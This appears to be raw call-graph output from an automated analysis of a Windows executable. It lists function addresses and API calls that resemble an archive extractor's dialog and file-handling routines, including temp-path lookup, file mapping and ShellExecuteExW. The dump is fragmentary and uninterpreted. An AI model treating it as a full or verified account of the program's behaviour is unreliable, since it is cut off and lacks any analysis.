26038->25995 26039->26011 26042->25971 26044->26036 26046 7ff720b320f6 26045->26046 26048 7ff720b320cb memcpy_s 26045->26048 26049 7ff720b31474 33 API calls 3 library calls 26046->26049 26048->25762 26049->26048 26050->25788 26052->25800 26053->25803 26055 7ff720b585cf SizeofResource 26054->26055 26056 7ff720b5871b 26054->26056 26055->26056 26057 7ff720b585e9 LoadResource 26055->26057 26056->25826 26057->26056 26058 7ff720b58602 LockResource 26057->26058 26058->26056 26059 7ff720b58617 GlobalAlloc 26058->26059 26059->26056 26060 7ff720b58638 GlobalLock 26059->26060 26061 7ff720b5864a memcpy_s 26060->26061 26062 7ff720b58712 GlobalFree 26060->26062 26063 7ff720b58658 CreateStreamOnHGlobal 26061->26063 26062->26056 26064 7ff720b58709 GlobalUnlock 26063->26064 26065 7ff720b58676 GdipAlloc 26063->26065 26064->26062 26066 7ff720b5868b 26065->26066 26066->26064 26067 7ff720b586da GdipCreateHBITMAPFromBitmap 26066->26067 26068 7ff720b586f2 26066->26068 26067->26068 26068->26064 26070 7ff720b5844c 4 API calls 26069->26070 26071 7ff720b5842a 26070->26071 26072 7ff720b58439 26071->26072 26080 7ff720b58484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26071->26080 26072->25832 26072->25833 26072->25834 26074->25837 26076 7ff720b5845e 26075->26076 26077 7ff720b58463 26075->26077 26081 7ff720b58510 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26076->26081 26079 7ff720b58d74 16 API calls _handle_error 26077->26079 26079->25842 26080->26072 26081->26077 26085 7ff720b498be _snwprintf 26082->26085 26083 7ff720b49933 26203 7ff720b46870 48 API calls 26083->26203 26085->26083 26087 7ff720b49a49 26085->26087 26086 7ff720b31fa0 31 API calls 26088 7ff720b499bd 26086->26088 26087->26088 26091 7ff720b320b0 33 API calls 26087->26091 26151 7ff720b42480 26088->26151 26089 7ff720b4993d memcpy_s 26089->26086 26090 7ff720b4a3ee 26089->26090 26092 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26090->26092 26091->26088 26094 7ff720b4a3f4 26092->26094 26097 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26094->26097 26096 7ff720b499e2 26099 7ff720b42004 100 API calls 26096->26099 26100 7ff720b4a3fa 26097->26100 26098 7ff720b49ad7 26169 7ff720b6a3d0 26098->26169 26102 7ff720b499eb 26099->26102 26102->26094 26105 7ff720b49a26 26102->26105 26104 7ff720b49a6d 26104->26098 26109 7ff720b48e18 33 API calls 26104->26109 26107 7ff720b622a0 _handle_error 8 API calls 26105->26107 26106 7ff720b6a3d0 31 API calls 26120 7ff720b49b17 __vcrt_InitializeCriticalSectionEx 26106->26120 26108 7ff720b4a3ce 26107->26108 26108->25845 26109->26104 26110 7ff720b49c49 26111 7ff720b42a60 101 API calls 26110->26111 26123 7ff720b49d1c 26110->26123 26114 7ff720b49c61 26111->26114 26117 7ff720b42890 104 API calls 26114->26117 26114->26123 26121 7ff720b49c89 26117->26121 26120->26110 26120->26123 26177 7ff720b42b70 26120->26177 26186 7ff720b42890 26120->26186 26191 7ff720b42a60 26120->26191 26121->26123 26143 7ff720b49c97 __vcrt_InitializeCriticalSectionEx 26121->26143 26204 7ff720b50b3c MultiByteToWideChar 26121->26204 26196 7ff720b42004 26123->26196 26124 7ff720b4a1ac 26133 7ff720b4a282 26124->26133 26210 7ff720b6cf10 31 API calls 2 library calls 26124->26210 26126 7ff720b4a117 26126->26124 26207 7ff720b6cf10 31 API calls 2 library calls 26126->26207 26127 7ff720b4a10b 26127->25845 26130 7ff720b4a209 26211 7ff720b6b73c 31 API calls _invalid_parameter_noinfo_noreturn 26130->26211 26131 7ff720b4a362 26134 7ff720b6a3d0 31 API calls 26131->26134 26132 7ff720b4a26e 26132->26133 26212 7ff720b48c90 33 API calls 2 library calls 26132->26212 26133->26131 26135 7ff720b48e18 33 API calls 26133->26135 26137 7ff720b4a38b 26134->26137 26135->26133 26140 7ff720b6a3d0 31 API calls 26137->26140 26139 7ff720b4a12d 26208 7ff720b6b73c 31 API calls _invalid_parameter_noinfo_noreturn 26139->26208 26140->26123 26141 7ff720b4a198 26141->26124 26209 7ff720b48c90 33 API calls 2 library calls 26141->26209 26143->26123 26143->26124 26143->26126 26143->26127 26144 7ff720b4a3e9 26143->26144 26146 7ff720b50ee8 WideCharToMultiByte 26143->26146 26205 7ff720b4aa48 45 API calls _snwprintf 26143->26205 26206 7ff720b6a1f0 31 API calls 2 library calls 26143->26206 26213 7ff720b625a4 8 API calls 26144->26213 26146->26143 26150 7ff720b4a428 26149->26150 26150->25847 26152 7ff720b424bd CreateFileW 26151->26152 26154 7ff720b4256e GetLastError 26152->26154 26157 7ff720b4262e 26152->26157 26155 7ff720b469cc 49 API calls 26154->26155 26156 7ff720b4259c 26155->26156 26158 7ff720b425a0 CreateFileW GetLastError 26156->26158 26164 7ff720b425ec 26156->26164 26159 7ff720b42671 SetFileTime 26157->26159 26163 7ff720b4268f 26157->26163 26158->26164 26159->26163 26160 7ff720b426c8 26161 7ff720b622a0 _handle_error 8 API calls 26160->26161 26162 7ff720b426db 26161->26162 26162->26096 26162->26104 26163->26160 26166 7ff720b320b0 33 API calls 26163->26166 26164->26157 26165 7ff720b426f6 26164->26165 26167 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26165->26167 26166->26160 26168 7ff720b426fb 26167->26168 26170 7ff720b6a3fd 26169->26170 26172 7ff720b6a412 26170->26172 26214 7ff720b6d61c 15 API calls memcpy_s 26170->26214 26174 7ff720b622a0 _handle_error 8 API calls 26172->26174 26173 7ff720b6a407 26215 7ff720b67864 31 API calls _invalid_parameter_noinfo_noreturn 26173->26215 26176 7ff720b49af7 26174->26176 26176->26106 26179 7ff720b42b8d 26177->26179 26180 7ff720b42ba9 26177->26180 26178 7ff720b42bbb 26178->26120 26179->26178 26216 7ff720b3b9d4 99 API calls Concurrency::cancel_current_task 26179->26216 26180->26178 26182 7ff720b42bc1 SetFilePointer 26180->26182 26182->26178 26183 7ff720b42bde GetLastError 26182->26183 26183->26178 26184 7ff720b42be8 26183->26184 26184->26178 26217 7ff720b3b9d4 99 API calls Concurrency::cancel_current_task 26184->26217 26187 7ff720b428b6 26186->26187 26188 7ff720b428bd 26186->26188 26187->26120 26188->26187 26190 7ff720b422e0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26188->26190 26218 7ff720b3b8b4 99 API calls Concurrency::cancel_current_task 26188->26218 26190->26188 26219 7ff720b42738 26191->26219 26194 7ff720b42a87 26194->26120 26197 7ff720b4201e 26196->26197 26198 7ff720b4202f 26196->26198 26197->26198 26199 7ff720b4202a 26197->26199 26200 7ff720b42031 26197->26200 26227 7ff720b422a0 26199->26227 26231 7ff720b42090 26200->26231 26203->26089 26204->26143 26205->26143 26206->26143 26207->26139 26208->26141 26209->26124 26210->26130 26211->26132 26212->26133 26213->26090 26214->26173 26215->26172 26225 7ff720b42749 _snwprintf 26219->26225 26220 7ff720b42775 26222 7ff720b622a0 _handle_error 8 API calls 26220->26222 26221 7ff720b42850 SetFilePointer 26221->26220 26223 7ff720b42878 GetLastError 26221->26223 26224 7ff720b427dd 26222->26224 26223->26220 26224->26194 26226 7ff720b3b9d4 99 API calls Concurrency::cancel_current_task 26224->26226 26225->26220 26225->26221 26228 7ff720b422c3 26227->26228 26229 7ff720b422af 26227->26229 26228->26198 26229->26228 26230 7ff720b42090 100 API calls 26229->26230 26230->26228 26232 7ff720b420aa 26231->26232 26233 7ff720b420c2 26231->26233 26232->26233 26235 7ff720b420b6 CloseHandle 26232->26235 26234 7ff720b420e6 26233->26234 26237 7ff720b3b554 99 API calls 26233->26237 26234->26198 26235->26233 26237->26234 26239 7ff720b61553 26238->26239 26240 7ff720b614ee 26238->26240 26239->25858 26239->25859 26254 7ff720b61584 26240->26254 26243 7ff720b6154e 26245 7ff720b61584 DloadReleaseSectionWriteAccess 3 API calls 26243->26245 26245->26239 26247 7ff720b617f8 26246->26247 26248 7ff720b61851 26246->26248 26249 7ff720b61584 DloadReleaseSectionWriteAccess 3 API calls 26247->26249 26248->25874 26250 7ff720b617fd 26249->26250 26251 7ff720b6184c 26250->26251 26252 7ff720b61758 DloadProtectSection 3 API calls 26250->26252 26253 7ff720b61584 DloadReleaseSectionWriteAccess 3 API calls 26251->26253 26252->26251 26253->26248 26255 7ff720b614f3 26254->26255 26256 7ff720b6159f 26254->26256 26255->26243 26261 7ff720b61758 26255->26261 26256->26255 26257 7ff720b615a4 GetModuleHandleW 26256->26257 26258 7ff720b615be GetProcAddress 26257->26258 26260 7ff720b615b9 26257->26260 26259 7ff720b615d3 GetProcAddress 26258->26259 26258->26260 26259->26260 26260->26255 26264 7ff720b6177a DloadProtectSection 26261->26264 26262 7ff720b61782 26262->26243 26263 7ff720b617ba VirtualProtect 26263->26262 26264->26262 26264->26263 26266 7ff720b61624 VirtualQuery GetSystemInfo 26264->26266 26266->26263 26267->25891 26268->25893 26269->25888 26271 7ff720b4b952 memcpy_s 26270->26271 26273 7ff720b4b9f8 26271->26273 26274 7ff720b4b9c4 GetProcAddressForCaller GetProcAddress 26271->26274 26272 7ff720b4ba86 GetCurrentProcessId 26275 7ff720b4ba67 26272->26275 26273->26272 26276 7ff720b4ba2a 26273->26276 26274->26273 26275->25896 26276->26275 26282 7ff720b3b67c 99 API calls _handle_error 26276->26282 26278 7ff720b4ba52 26283 7ff720b3ba60 99 API calls 3 library calls 26278->26283 26280 7ff720b4ba5a 26284 7ff720b3b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 26280->26284 26282->26278 26283->26280 26284->26275 26285 7ff720b60d75 14 API calls _com_raise_error 26367 7ff720b5b110 26710 7ff720b3255c 26367->26710 26369 7ff720b5b15b 26370 7ff720b5be13 26369->26370 26371 7ff720b5b16f 26369->26371 26525 7ff720b5b18c 26369->26525 26977 7ff720b5f310 26370->26977 26375 7ff720b5b25b 26371->26375 26376 7ff720b5b17f 26371->26376 26371->26525 26374 7ff720b622a0 _handle_error 8 API calls 26379 7ff720b5c2d0 26374->26379 26382 7ff720b5b311 26375->26382 26387 7ff720b5b275 26375->26387 26380 7ff720b5b187 26376->26380 26381 7ff720b5b229 26376->26381 26377 7ff720b5be3a SendMessageW 26378 7ff720b5be49 26377->26378 26384 7ff720b5be55 SendDlgItemMessageW 26378->26384 26385 7ff720b5be70 GetDlgItem SendMessageW 26378->26385 26390 7ff720b4aaa0 48 API calls 26380->26390 26380->26525 26386 7ff720b5b24b EndDialog 26381->26386 26381->26525 26718 7ff720b322bc GetDlgItem 26382->26718 26384->26385 26389 7ff720b4629c 35 API calls 26385->26389 26386->26525 26391 7ff720b4aaa0 48 API calls 26387->26391 26392 7ff720b5bec7 GetDlgItem 26389->26392 26393 7ff720b5b1b6 26390->26393 26394 7ff720b5b293 SetDlgItemTextW 26391->26394 26996 7ff720b32520 26392->26996 27000 7ff720b31ec4 34 API calls _handle_error 26393->27000 26399 7ff720b5b2a6 26394->26399 26397 7ff720b5b388 GetDlgItem 26403 7ff720b5b3cf SetFocus 26397->26403 26404 7ff720b5b3a2 SendMessageW SendMessageW 26397->26404 26398 7ff720b5b375 26414 7ff720b5bc45 26398->26414 26535 7ff720b5b331 EndDialog 26398->26535 26405 7ff720b5b2c0 GetMessageW 26399->26405 26399->26525 26402 7ff720b5b1c6 26410 7ff720b5b1dc 26402->26410 26417 7ff720b3250c SetDlgItemTextW 26402->26417 26406 7ff720b5b3e5 26403->26406 26407 7ff720b5b472 26403->26407 26404->26403 26412 7ff720b5b2de IsDialogMessageW 26405->26412 26405->26525 26413 7ff720b4aaa0 48 API calls 26406->26413 26732 7ff720b38d04 26407->26732 26408 7ff720b5b35a 26415 7ff720b31fa0 31 API calls 26408->26415 26424 7ff720b5c2e3 26410->26424 26410->26525 26412->26399 26419 7ff720b5b2f3 TranslateMessage DispatchMessageW 26412->26419 26420 7ff720b5b3ef 26413->26420 26421 7ff720b4aaa0 48 API calls 26414->26421 26415->26525 26417->26410 26418 7ff720b5b4ac 26742 7ff720b5ef00 26418->26742 26419->26399 26434 7ff720b3129c 33 API calls 26420->26434 26425 7ff720b5bc56 SetDlgItemTextW 26421->26425 26430 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26424->26430 26429 7ff720b4aaa0 48 API calls 26425->26429 26435 7ff720b5bc88 26429->26435 26436 7ff720b5c2e8 26430->26436 26433 7ff720b4aaa0 48 API calls 26438 7ff720b5b4d5 26433->26438 26439 7ff720b5b418 26434->26439 26450 7ff720b3129c 33 API calls 26435->26450 26445 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26436->26445 26442 7ff720b4da14 48 API calls 26438->26442 26443 7ff720b5f024 24 API calls 26439->26443 26447 7ff720b5b4e8 26442->26447 26448 7ff720b5b425 26443->26448 26451 7ff720b5c2ee 26445->26451 26756 7ff720b5f024 26447->26756 26448->26436 26470 7ff720b5b468 26448->26470 26479 7ff720b5bcb1 26450->26479 26463 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26451->26463 26462 7ff720b5bd5a 26472 7ff720b4aaa0 48 API calls 26462->26472 26473 7ff720b5c2f4 26463->26473 26466 7ff720b31fa0 31 API calls 26477 7ff720b5b506 26466->26477 26469 7ff720b5b56c 26482 7ff720b5b59a 26469->26482 27002 7ff720b43268 26469->27002 26470->26469 27001 7ff720b5fa00 33 API calls 2 library calls 26470->27001 26474 7ff720b5bd64 26472->26474 26484 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26473->26484 26494 7ff720b3129c 33 API calls 26474->26494 26477->26451 26477->26470 26479->26462 26489 7ff720b3129c 33 API calls 26479->26489 26770 7ff720b42f18 26482->26770 26488 7ff720b5c2fa 26484->26488 26501 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26488->26501 26495 7ff720b5bcff 26489->26495 26500 7ff720b5bd8d 26494->26500 26503 7ff720b4aaa0 48 API calls 26495->26503 26498 7ff720b5b5cc 26785 7ff720b47f84 26498->26785 26499 7ff720b5b5b4 GetLastError 26499->26498 26517 7ff720b3129c 33 API calls 26500->26517 26507 7ff720b5c300 26501->26507 26508 7ff720b5bd0a 26503->26508 26505 7ff720b5b58e 27005 7ff720b59d10 12 API calls _handle_error 26505->27005 26518 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26507->26518 26513 7ff720b31150 33 API calls 26508->26513 26511 7ff720b5b5de 26515 7ff720b5b5f4 26511->26515 26516 7ff720b5b5e5 GetLastError 26511->26516 26519 7ff720b5bd22 26513->26519 26521 7ff720b5b69c 26515->26521 26526 7ff720b5b60b GetTickCount 26515->26526 26527 7ff720b5b6ab 26515->26527 26516->26515 26522 7ff720b5bdce 26517->26522 26523 7ff720b5c306 26518->26523 26529 7ff720b32034 33 API calls 26519->26529 26521->26527 26543 7ff720b5baf9 26521->26543 26536 7ff720b31fa0 31 API calls 26522->26536 26528 7ff720b3255c 61 API calls 26523->26528 26525->26374 26788 7ff720b34228 26526->26788 26532 7ff720b5b9d0 26527->26532 26540 7ff720b46414 34 API calls 26527->26540 26531 7ff720b5c364 26528->26531 26533 7ff720b5bd3e 26529->26533 26537 7ff720b5c368 26531->26537 26546 7ff720b5c409 GetDlgItem SetFocus 26531->26546 26593 7ff720b5c37d 26531->26593 26532->26535 27016 7ff720b3bd1c 33 API calls 26532->27016 26541 7ff720b31fa0 31 API calls 26533->26541 26535->26408 26544 7ff720b5bdf8 26536->26544 26553 7ff720b622a0 _handle_error 8 API calls 26537->26553 26548 7ff720b5b6ce 26540->26548 26549 7ff720b5bd4c 26541->26549 26558 7ff720b4aaa0 48 API calls 26543->26558 26551 7ff720b31fa0 31 API calls 26544->26551 26545 7ff720b5b9f5 27017 7ff720b31150 26545->27017 26556 7ff720b5c43a 26546->26556 27006 7ff720b4b8d0 26548->27006 26555 7ff720b31fa0 31 API calls 26549->26555 26550 7ff720b5b63a 26557 7ff720b31fa0 31 API calls 26550->26557 26559 7ff720b5be03 26551->26559 26561 7ff720b5ca17 26553->26561 26555->26462 26563 7ff720b3129c 33 API calls 26556->26563 26564 7ff720b5b648 26557->26564 26565 7ff720b5bb27 SetDlgItemTextW 26558->26565 26566 7ff720b31fa0 31 API calls 26559->26566 26560 7ff720b5ba0a 26567 7ff720b4aaa0 48 API calls 26560->26567 26562 7ff720b5b6e8 26570 7ff720b4da14 48 API calls 26562->26570 26571 7ff720b5c44c 26563->26571 26798 7ff720b420f4 26564->26798 26572 7ff720b32534 26565->26572 26566->26408 26573 7ff720b5ba17 26567->26573 26568 7ff720b5c3b4 SendDlgItemMessageW 26574 7ff720b5c3dd EndDialog 26568->26574 26575 7ff720b5c3d4 26568->26575 26576 7ff720b5b72a GetCommandLineW 26570->26576 27021 7ff720b48098 33 API calls 26571->27021 26580 7ff720b5bb45 SetDlgItemTextW GetDlgItem 26572->26580 26581 7ff720b31150 33 API calls 26573->26581 26574->26537 26575->26574 26577 7ff720b5b7e9 26576->26577 26578 7ff720b5b7cf 26576->26578 27010 7ff720b5aad4 33 API calls _handle_error 26577->27010 26594 7ff720b320b0 33 API calls 26578->26594 26585 7ff720b5bb93 26580->26585 26586 7ff720b5bb70 GetWindowLongPtrW SetWindowLongPtrW 26580->26586 26587 7ff720b5ba2a 26581->26587 26582 7ff720b5c460 26588 7ff720b3250c SetDlgItemTextW 26582->26588 26814 7ff720b5ce08 26585->26814 26586->26585 26592 7ff720b31fa0 31 API calls 26587->26592 26595 7ff720b5c474 26588->26595 26589 7ff720b5b7fa 27011 7ff720b5aad4 33 API calls _handle_error 26589->27011 26600 7ff720b5ba35 26592->26600 26593->26537 26593->26568 26594->26577 26605 7ff720b5c4a6 SendDlgItemMessageW FindFirstFileW 26595->26605 26597 7ff720b5b684 26602 7ff720b42004 100 API calls 26597->26602 26598 7ff720b5b675 GetLastError 26598->26597 26604 7ff720b31fa0 31 API calls 26600->26604 26601 7ff720b5b80b 27012 7ff720b5aad4 33 API calls _handle_error 26601->27012 26607 7ff720b5b691 26602->26607 26603 7ff720b5ce08 160 API calls 26608 7ff720b5bbbc 26603->26608 26609 7ff720b5ba43 26604->26609 26610 7ff720b5c4fb 26605->26610 26703 7ff720b5c984 26605->26703 26612 7ff720b31fa0 31 API calls 26607->26612 26964 7ff720b5f8f4 26608->26964 26619 7ff720b4aaa0 48 API calls 26609->26619 26620 7ff720b4aaa0 48 API calls 26610->26620 26611 7ff720b5b81c 26614 7ff720b4b970 102 API calls 26611->26614 26612->26521 26616 7ff720b5b833 26614->26616 27013 7ff720b5fb5c 33 API calls 26616->27013 26617 7ff720b5ca01 26617->26537 26618 7ff720b5ce08 160 API calls 26633 7ff720b5bbea 26618->26633 26623 7ff720b5ba5b 26619->26623 26624 7ff720b5c51e 26620->26624 26622 7ff720b5ca29 26626 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26622->26626 26634 7ff720b3129c 33 API calls 26623->26634 26635 7ff720b3129c 33 API calls 26624->26635 26625 7ff720b5b852 CreateFileMappingW 26629 7ff720b5b8d3 ShellExecuteExW 26625->26629 26630 7ff720b5b891 MapViewOfFile 26625->26630 26631 7ff720b5ca2e 26626->26631 26627 7ff720b5bc16 26976 7ff720b32298 GetDlgItem EnableWindow 26627->26976 26650 7ff720b5b8f4 26629->26650 27014 7ff720b635c0 26630->27014 26636 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26631->26636 26633->26627 26637 7ff720b5ce08 160 API calls 26633->26637 26641 7ff720b5ba84 26634->26641 26638 7ff720b5c54d 26635->26638 26639 7ff720b5ca34 26636->26639 26637->26627 26640 7ff720b31150 33 API calls 26638->26640 26645 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26639->26645 26643 7ff720b5c568 26640->26643 26641->26488 26642 7ff720b5bada 26641->26642 26646 7ff720b31fa0 31 API calls 26642->26646 27022 7ff720b3e174 33 API calls 2 library calls 26643->27022 26644 7ff720b5b943 26651 7ff720b5b95c UnmapViewOfFile CloseHandle 26644->26651 26652 7ff720b5b96f 26644->26652 26648 7ff720b5ca3a 26645->26648 26646->26535 26654 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26648->26654 26649 7ff720b5c57f 26655 7ff720b31fa0 31 API calls 26649->26655 26650->26644 26659 7ff720b5b931 Sleep 26650->26659 26651->26652 26652->26473 26653 7ff720b5b9a5 26652->26653 26657 7ff720b31fa0 31 API calls 26653->26657 26656 7ff720b5ca40 26654->26656 26658 7ff720b5c58c 26655->26658 26661 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26656->26661 26660 7ff720b5b9c2 26657->26660 26658->26631 26663 7ff720b31fa0 31 API calls 26658->26663 26659->26644 26659->26650 26662 7ff720b31fa0 31 API calls 26660->26662 26664 7ff720b5ca46 26661->26664 26662->26532 26665 7ff720b5c5f3 26663->26665 26668 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26664->26668 26666 7ff720b3250c SetDlgItemTextW 26665->26666 26667 7ff720b5c607 FindClose 26666->26667 26669 7ff720b5c717 SendDlgItemMessageW 26667->26669 26670 7ff720b5c623 26667->26670 26671 7ff720b5ca4c 26668->26671 26673 7ff720b5c74b 26669->26673 27023 7ff720b5a24c 10 API calls _handle_error 26670->27023 26676 7ff720b4aaa0 48 API calls 26673->26676 26674 7ff720b5c646 26675 7ff720b4aaa0 48 API calls 26674->26675 26677 7ff720b5c64f 26675->26677 26678 7ff720b5c758 26676->26678 26679 7ff720b4da14 48 API calls 26677->26679 26680 7ff720b3129c 33 API calls 26678->26680 26683 7ff720b5c66c memcpy_s 26679->26683 26682 7ff720b5c787 26680->26682 26681 7ff720b31fa0 31 API calls 26684 7ff720b5c703 26681->26684 26685 7ff720b31150 33 API calls 26682->26685 26683->26639 26683->26681 26686 7ff720b3250c SetDlgItemTextW 26684->26686 26687 7ff720b5c7a2 26685->26687 26686->26669 27024 7ff720b3e174 33 API calls 2 library calls 26687->27024 26689 7ff720b5c7b9 26690 7ff720b31fa0 31 API calls 26689->26690 26691 7ff720b5c7c5 memcpy_s 26690->26691 26692 7ff720b31fa0 31 API calls 26691->26692 26693 7ff720b5c7ff 26692->26693 26694 7ff720b31fa0 31 API calls 26693->26694 26695 7ff720b5c80c 26694->26695 26695->26648 26696 7ff720b31fa0 31 API calls 26695->26696 26697 7ff720b5c873 26696->26697 26698 7ff720b3250c SetDlgItemTextW 26697->26698 26699 7ff720b5c887 26698->26699 26699->26703 27025 7ff720b5a24c 10 API calls _handle_error 26699->27025 26701 7ff720b5c8b2 26702 7ff720b4aaa0 48 API calls 26701->26702 26704 7ff720b5c8bc 26702->26704 26703->26537 26703->26617 26703->26622 26703->26664 26705 7ff720b4da14 48 API calls 26704->26705 26707 7ff720b5c8d9 memcpy_s 26705->26707 26706 7ff720b31fa0 31 API calls 26708 7ff720b5c970 26706->26708 26707->26656 26707->26706 26709 7ff720b3250c SetDlgItemTextW 26708->26709 26709->26703 26711 7ff720b3256a 26710->26711 26712 7ff720b325d0 26710->26712 26711->26712 27026 7ff720b4a46c 26711->27026 26712->26369 26714 7ff720b3258f 26714->26712 26715 7ff720b325a4 GetDlgItem 26714->26715 26715->26712 26716 7ff720b325b7 26715->26716 26716->26712 26717 7ff720b325be SetWindowTextW 26716->26717 26717->26712 26719 7ff720b322fc 26718->26719 26720 7ff720b32334 26718->26720 26722 7ff720b3129c 33 API calls 26719->26722 27075 7ff720b323f8 GetWindowTextLengthW 26720->27075 26723 7ff720b3232a memcpy_s 26722->26723 26724 7ff720b32389 26723->26724 26725 7ff720b31fa0 31 API calls 26723->26725 26728 7ff720b323f0 26724->26728 26729 7ff720b323c8 26724->26729 26725->26724 26726 7ff720b622a0 _handle_error 8 API calls 26727 7ff720b323dd 26726->26727 26727->26397 26727->26398 26727->26535 26730 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26728->26730 26729->26726 26731 7ff720b323f5 26730->26731 26733 7ff720b38d34 26732->26733 26740 7ff720b38de8 26732->26740 26736 7ff720b38de3 26733->26736 26738 7ff720b38d91 26733->26738 26739 7ff720b38d42 memcpy_s 26733->26739 27087 7ff720b31f80 33 API calls 3 library calls 26736->27087 26738->26739 26741 7ff720b62150 33 API calls 26738->26741 26739->26418 27088 7ff720b32004 33 API calls std::_Xinvalid_argument 26740->27088 26741->26739 26746 7ff720b5ef30 26742->26746 26743 7ff720b5ef57 26744 7ff720b622a0 _handle_error 8 API calls 26743->26744 26745 7ff720b5b4b7 26744->26745 26745->26433 26746->26743 27089 7ff720b3bd1c 33 API calls 26746->27089 26748 7ff720b5efaa 26749 7ff720b31150 33 API calls 26748->26749 26750 7ff720b5efbf 26749->26750 26752 7ff720b31fa0 31 API calls 26750->26752 26754 7ff720b5efcf memcpy_s 26750->26754 26751 7ff720b31fa0 31 API calls 26753 7ff720b5eff6 26751->26753 26752->26754 26755 7ff720b31fa0 31 API calls 26753->26755 26754->26751 26755->26743 27090 7ff720b5ad9c PeekMessageW 26756->27090 26759 7ff720b5f0c3 SendMessageW SendMessageW 26761 7ff720b5f109 26759->26761 26762 7ff720b5f124 SendMessageW 26759->26762 26760 7ff720b5f075 26763 7ff720b5f081 ShowWindow SendMessageW SendMessageW 26760->26763 26761->26762 26764 7ff720b5f143 26762->26764 26765 7ff720b5f146 SendMessageW SendMessageW 26762->26765 26763->26759 26764->26765 26766 7ff720b5f198 SendMessageW 26765->26766 26767 7ff720b5f173 SendMessageW 26765->26767 26768 7ff720b622a0 _handle_error 8 API calls 26766->26768 26767->26766 26769 7ff720b5b4f8 26768->26769 26769->26466 26771 7ff720b43063 26770->26771 26775 7ff720b42f4e 26770->26775 26772 7ff720b622a0 _handle_error 8 API calls 26771->26772 26773 7ff720b43073 26772->26773 26773->26498 26773->26499 26774 7ff720b43037 26774->26771 26776 7ff720b43050 26774->26776 26775->26774 26781 7ff720b42fc9 26775->26781 27096 7ff720b43644 56 API calls 2 library calls 26776->27096 26778 7ff720b3129c 33 API calls 26778->26781 26779 7ff720b4305d 26779->26771 26781->26775 26781->26778 26782 7ff720b43088 26781->26782 27095 7ff720b43644 56 API calls 2 library calls 26781->27095 26783 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26782->26783 26784 7ff720b4308d 26783->26784 26786 7ff720b47f92 SetCurrentDirectoryW 26785->26786 26787 7ff720b47f8f 26785->26787 26786->26511 26787->26786 26789 7ff720b34255 26788->26789 26790 7ff720b3426a 26789->26790 26791 7ff720b3129c 33 API calls 26789->26791 26792 7ff720b622a0 _handle_error 8 API calls 26790->26792 26791->26790 26793 7ff720b342a1 26792->26793 26794 7ff720b33c84 26793->26794 26795 7ff720b33cab 26794->26795 27097 7ff720b3710c 26795->27097 26797 7ff720b33cbb memcpy_s 26797->26550 26800 7ff720b4212a 26798->26800 26799 7ff720b4215e 26802 7ff720b4223f 26799->26802 26804 7ff720b469cc 49 API calls 26799->26804 26800->26799 26801 7ff720b42171 CreateFileW 26800->26801 26801->26799 26803 7ff720b4226f 26802->26803 26807 7ff720b320b0 33 API calls 26802->26807 26805 7ff720b622a0 _handle_error 8 API calls 26803->26805 26806 7ff720b421c9 26804->26806 26808 7ff720b42284 26805->26808 26809 7ff720b421cd CreateFileW 26806->26809 26810 7ff720b42206 26806->26810 26807->26803 26808->26597 26808->26598 26809->26810 26810->26802 26811 7ff720b42298 26810->26811 26812 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26811->26812 26813 7ff720b4229d 26812->26813 27109 7ff720b5a988 26814->27109 26816 7ff720b5d16e 26817 7ff720b31fa0 31 API calls 26816->26817 26818 7ff720b5d177 26817->26818 26820 7ff720b622a0 _handle_error 8 API calls 26818->26820 26819 7ff720b4d1e8 33 API calls 26963 7ff720b5ce83 memcpy_s 26819->26963 26821 7ff720b5bbab 26820->26821 26821->26603 26822 7ff720b5ee7a 27248 7ff720b3704c 47 API calls memcpy_s 26822->27248 26825 7ff720b5ee80 27249 7ff720b3704c 47 API calls memcpy_s 26825->27249 26827 7ff720b5ee86 26831 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26827->26831 26829 7ff720b5ee6e 26830 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26829->26830 26832 7ff720b5ee74 26830->26832 26833 7ff720b5ee8c 26831->26833 27247 7ff720b3704c 47 API calls memcpy_s 26832->27247 26836 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26833->26836 26838 7ff720b5ee92 26836->26838 26837 7ff720b5edca 26839 7ff720b5ee52 26837->26839 26840 7ff720b320b0 33 API calls 26837->26840 26843 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26838->26843 27245 7ff720b31f80 33 API calls 3 library calls 26839->27245 26845 7ff720b5edf7 26840->26845 26841 7ff720b5ee68 27246 7ff720b32004 33 API calls std::_Xinvalid_argument 26841->27246 26842 7ff720b313a4 33 API calls 26846 7ff720b5dbba GetTempPathW 26842->26846 26847 7ff720b5ee98 26843->26847 27244 7ff720b5ab68 33 API calls 3 library calls 26845->27244 26846->26963 26855 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26847->26855 26848 7ff720b4629c 35 API calls 26848->26963 26851 7ff720b6bb0c 43 API calls 26851->26963 26853 7ff720b5ee0d 26862 7ff720b31fa0 31 API calls 26853->26862 26866 7ff720b5ee24 memcpy_s 26853->26866 26854 7ff720b32520 SetWindowTextW 26854->26963 26859 7ff720b5ee9e 26855->26859 26858 7ff720b3129c 33 API calls 26858->26963 26864 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26859->26864 26860 7ff720b5e773 26860->26839 26860->26841 26865 7ff720b62150 33 API calls 